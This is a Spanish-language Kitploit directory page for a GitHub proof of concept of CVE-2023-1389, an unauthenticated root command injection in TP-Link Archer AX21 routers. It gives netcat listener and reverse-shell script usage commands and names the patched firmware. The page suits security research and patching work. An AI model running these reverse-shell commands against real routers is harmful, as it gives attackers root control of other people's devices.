Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-1389 — Pruebas de concepto para CVE-2023-1389, una inyección de comandos no autenticada en TP-Link Archer AX21, que proporciona capacidades de transferencia de archivos y shell inversa. | Kitploit
Herramientas/GitHubGitHub/voyag3r-security/cve-2023-1389
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubvoyag3r-security/cve-2023-1389

CVE-2023-1389

Pruebas de concepto para CVE-2023-1389, una inyección de comandos no autenticada en TP-Link Archer AX21, que proporciona capacidades de transferencia de archivos y shell inversa.

Ver Repositorio
1774hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Descripción

CVE-2023–1389 es una vulnerabilidad de inyección de comandos no autenticada en el router WiFi TP-Link Archer AX21. Una devolución de llamada en el parámetro country utiliza la función popen(), que se ejecuta como root, lo que permite al atacante inyectar valores arbitrarios a través de solicitudes GET o POST a la interfaz de administración, sin requerir autenticación. Se pueden encontrar más detalles sobre la vulnerabilidad aquí.

Estos son un par de Proof-of-Concepts que creé mientras exploraba la inyección de comandos. Archer-file-transfer.py fue la primera iteración y es bastante complicado en cómo logra la interacción. Archer-rev-shell.py te proporciona una sencilla reverse shell con netcat, y probablemente sea el que estás buscando. Si quieres aprender más sobre el desarrollo de estos scripts, puedes leer el artículo aquí.

Uso

En una ventana de terminal:

root@kitploit:~
nc your_IP listener_port

En una segunda ventana de terminal:

root@kitploit:~
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port

Mitigación

TP-Link ha lanzado la versión de firmware 1.1.4 Build 20230219 que soluciona el problema eliminando la devolución de llamada vulnerable. Actualizar tu router al firmware más reciente debería proteger tu dispositivo.

Futuro

Probablemente no mantendré estos PoCs. Ambos son bastante simples y deberían ser fáciles de modificar según sea necesario.

Descargar herramienta